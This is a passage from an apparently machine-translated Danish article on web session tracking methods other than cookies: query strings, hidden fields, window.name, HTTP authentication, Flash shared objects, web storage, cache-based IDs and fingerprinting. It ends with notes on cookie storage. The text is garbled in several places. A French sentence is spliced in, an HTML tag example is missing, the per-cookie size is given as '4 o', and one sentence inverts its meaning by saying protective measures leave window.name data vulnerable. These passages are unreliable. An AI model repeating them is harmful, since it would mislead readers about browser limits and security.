En mere præcis teknik er baseret på indlejring af information i URL'er. Forespørgselsstrengdelen af ​​URL'en er en teknik, der typisk bruges til dette formål, men andre dele kan også bruges. Både Java-serverlet og PHP-sessionsmekanismerne bruger denne metode, hvis cookies ikke er aktiveret.

Denne metode involverer, at webserveren tilføjer strenganmodninger til links på den webside, der bærer den, når den sendes til browseren. Når brugeren følger et link, returnerer browseren den vedhæftede forespørgselsstreng til serveren.

Forespørgselsstrenge, der bruges til dette formål, og cookies er meget ens, idet de begge er information vilkårligt valgt af serveren og returneret af browseren. Der er dog nogle forskelle: Når en URL, der indeholder en forespørgselsstreng, genbruges, sendes den samme information til serveren. For eksempel, hvis en brugers præferencer er kodet i en forespørgselsstreng af en URL, og brugeren sender denne URL til en anden bruger via e-mail, vil denne bruger også være i stand til at bruge disse præferencer.

På den anden side, når en bruger tilgår den samme side to gange, er der ingen garanti for, at den samme forespørgselsstreng vil blive brugt begge gange. Hvis en bruger f.eks. lander på en side fra en intern webstedsside første gang og lander på samme side fra en ekstern side anden gang, er forespørgselsstrengen i forhold til webstedssiden typisk anderledes, mens cookies er de samme .

Andre ulemper ved forespørgselsstrenge er relateret til sikkerhed: at holde data, der identificerer en session, i forespørgselsstrenge, aktiverer eller forenkler sessionsfikseringsangreb, identifikatorreferenceangreb og andre udnyttelser. Det er mere sikkert at sende sessions-id'er som HTTP-cookies.

Skjult formularfelt

En form for sessionssporing, der bruges af ASP.NET, er at bruge webformularer med skjulte felter. Denne teknik minder meget om at bruge URL-forespørgselsstrenge til at bære information og har de samme fordele og ulemper; og hvis formularen behandles med HTTP GET-metoden, bliver felterne faktisk en del af URL'en på den browser, der sender den, når formularen indsendes. Men de fleste formularer behandles med HTTP POST, hvilket bevirker, at formularoplysningerne, inklusive skjulte felter, tilføjes som et ekstra input, der hverken er en del af URL'en eller en cookie.

Denne tilgang har to fordele set fra et sporingsperspektiv: For det første vil sporing af oplysningerne placeret i HTML-kildekoden og POST-input i stedet for URL'en give den gennemsnitlige bruger mulighed for at undgå denne sporing; for det andet kopieres sessionsoplysningerne ikke, når brugeren kopierer URL'en (for at gemme siden på disk eller sende den via e-mail, for eksempel).

vindue.navn

Alle almindelige webbrowsere kan gemme en ganske stor mængde data (2MB til 32MB) via JavaScript ved at bruge DOM'ens window.name-egenskab. Disse data kan bruges i stedet for sessionscookies og bruges også på tværs af domæner. Teknikken kan kobles med JSON-objekter for at gemme et komplekst sæt sessionsvariabler på klientsiden.

Ulempen er, at hvert separat vindue eller fane i starten vil have et tomt vindue.navn; når du browser efter faner (åbnet af brugeren) betyder det, at de faner, der åbnes individuelt, ikke vil have et vinduesnavn. Derudover kan window.name bruges til at spore besøgende på tværs af forskellige websteder, hvilket kan udgøre et privatlivsproblem.

I nogle henseender kan dette være mere sikkert end cookies, på grund af serverens manglende involvering, hvilket gør den usårbar over for netværksangreb fra sniffer-cookies. Men hvis der træffes særlige foranstaltninger for at beskytte dataene, er de sårbare over for yderligere angreb, da dataene er tilgængelige via andre sider, der åbnes i samme vindue.

HTTP-godkendelse

HTTP-protokollen inkluderer de grundlæggende adgangsgodkendelsesprotokoller og adgangsgodkendelsessammendraget, som kun giver adgang til en webside, når brugeren har givet brugernavn og adgangskode. Hvis serveren anmoder om et certifikat for at give adgang til en webside, anmoder browseren om det fra brugeren, og når først det er opnået, gemmer browseren det og sender det i alle efterfølgende HTTP-anmodninger. Disse oplysninger kan bruges til at spore brugeren.

Lokalt delt objekt

Hvis en browser inkluderer Adobe Flash Player plugin, lokale fælles objekter kan bruges til samme formål som cookies. De kan være et attraktivt valg for webudviklere, fordi:

  • standardstørrelsesgrænsen for et lokalt delt objekt er 100 KB;
  • sikkerhedstjek er adskilt fra bruger-cookie-tjek (så lokale delte objekter kan tillades, når cookies ikke er det).

Dette sidste punkt, som adskiller cookie-styringspolitikken fra Adobes lokale delte objekter rejser spørgsmål vedrørende brugerens styring af sine privatlivsindstillinger: han skal være opmærksom på, at hans håndtering af cookies ikke har nogen indflydelse på håndteringen af ​​lokale delte objekter og omvendt.

En anden kritik af dette system er, at det kun kan bruges gennem Adobe Flash Player plugin, som er proprietært og ikke en webstandard.

Vedholdenhed på klientsiden

Nogle webbrowsere understøtter en script-baseret persistensmekanisme, som gør det muligt for siden at gemme information lokalt til senere brug. Internet Explorer understøtter f.eks. vedvarende information i browserhistorik, bogmærker, i et format gemt i XML eller direkte med en webside gemt på disken. For Microsoft Internet Explorer 5 er der en brugerdatametode tilgængelig via DHTML-adfærd.

W3C introducerede i HTML 5 en ny JavaScript API til datalagring på klientsiden kaldet weblagring og havde til formål permanent at erstatte cookies. Det ligner cookies, men med stærkt forbedret kapacitet og uden lagring af information i headeren af ​​HTTP-anmodninger. API'en tillader to typer weblagring: lokal lagring og sessionslagring, svarende til vedvarende cookies og sessionscookies (bortset fra at sessionscookies udløber, når browseren lukkes, mens session opbevaring udløber, når fanen lukkes). Weblagring understøttes af Mozilla Firefox 3.5, Google Chrome 5, Apple Safari 4, Microsoft Internet Explorer 8 og Opera 10.50.

En anden mekanisme er normalt afhængig af browsercache (i hukommelsen i stedet for opdatering) ved hjælp af JavaScript-programmer på websider. 

For eksempel kan en side indeholde tagget . La première fois que la page se charge, le programme exemple.js est aussi chargé. 

På dette tidspunkt forbliver programmet i cachehukommelsen, og den besøgte side genindlæses ikke en anden gang. Derfor, hvis programmet indeholder en global variabel (for eksempel var id = 3243242;), forbliver denne identifikator gyldig og kan udnyttes af anden JavaScript-kode, når siden er indlæst igen, eller når en side, der linker til programmet, er indlæst. 

Den største ulempe ved denne metode er, at den globale JavaScript-variabel skal være statisk, hvilket betyder, at den ikke kan ændres eller slettes som en cookie.

webbrowser fingeraftryk

Et browserfingeraftryk er information indsamlet om konfigurationsindstillingerne for en browser til identifikationsformål. Disse fingeraftryk kan bruges til helt eller delvist at identificere en internetbruger eller en enhed, selv når cookies er deaktiveret.

Grundlæggende webbrowserkonfigurationsoplysninger er længe blevet indsamlet af webstedets publikumstjenester med det formål nøjagtigt at måle menneskelig webtrafik og opdage forskellige former for kliksvindel. Ved hjælp af scriptsprog på klientsiden er indsamling af meget mere nøjagtig information nu muligt.

Konvertering af disse oplysninger til en bitstreng producerer et enhedsfingeraftryk. I 2010 målte Electronic Frontier Foundation (EFF) entropien af ​​en browsers fingeraftryk til at være mindst 18,1 bits, og det var før fremskridt inden for lærredsfingeraftryk tilføjede 5,7 bit til den entropi.

Småkager i en nøddeskal

Cookies er små tekstfiler, som webbrowseren lagrer på en hjemmesidebesøgendes harddisk, og som bruges (blandt andet) til at registrere information om den besøgende eller dennes rejse gennem siden. Webmasteren kan således genkende en besøgendes vaner og personliggøre præsentationen af ​​sit websted for hver besøgende; cookies gør det så muligt at huske, hvor mange artikler der skal vises på hjemmesiden eller endda at beholde loginoplysningerne for enhver privat part: når den besøgende vender tilbage til siden, er det ikke længere nødvendigt for ham at indtaste sit navn og sin adgangskode til blive genkendt, da de automatisk læses i cookien.

En cookie har en begrænset levetid, indstillet af webstedsdesigneren. De kan også udløbe ved slutningen af ​​sessionen på webstedet, hvilket svarer til lukningen af ​​browseren. Cookies bruges i vid udstrækning til at gøre livet lettere for besøgende og præsentere dem med mere relevant information. Men specielle teknikker gør det muligt at følge en besøgende på flere sider og dermed at indsamle og krydstjekke meget omfattende information om hans vaner. Denne metode har givet brugen af ​​cookies et ry som en overvågningsteknik, der krænker de besøgendes privatliv, hvilket desværre svarer til virkeligheden i mange tilfælde af brug af ikke-tekniske årsager eller uden respekt for brugernes forventninger.

Som svar på denne legitime frygt introducerer HTML 5 en ny JavaScript API til datalagring på klientsiden kaldet weblagring, som er meget mere sikker og med større kapacitet, som har til formål at erstatte cookies.

Opbevaring af cookies

Med nogle browsere er en cookie let redigerbar, en simpel teksteditor som Notesblok er nok til at ændre dens værdier manuelt.

Cookies gemmes forskelligt afhængigt af browseren:

  • Microsoft Internet Explorer gemmer hver cookie i en anden fil;
  • Mozilla Firefox gemmer alle sine cookies i en enkelt fil;
  • Opera gemmer alle sine cookies i en enkelt fil og krypterer dem (umuligt at ændre dem undtagen i softwareindstillingerne);
  • Apple Safari gemmer alle sine cookies i en enkelt .plist-udvidelsesfil. Ændring er mulig, men ikke særlig let, medmindre du går gennem softwareindstillingerne.

Browsere er påkrævet for at understøtte et minimum :

  • 300 samtidige cookies;
  • 4 o pr. cookie;
  • 20 cookies pr. vært eller domæne.
[I alt: 0 Betyde: 0]

Skrevet af Anmeldelser Redaktører

Teamet af ekspertredaktører bruger deres tid på at undersøge produkter, udføre praksisstests, interviewe fagfolk i branchen, gennemgå forbrugeranmeldelser og skrive alle vores resultater som en forståelig og omfattende sammenfatning.

Skriv en kommentar

Din e-mail-adresse vil ikke blive offentliggjort. Påkrævede felter er markeret med *

Hvad mener du?

384 Points
upvote Downvote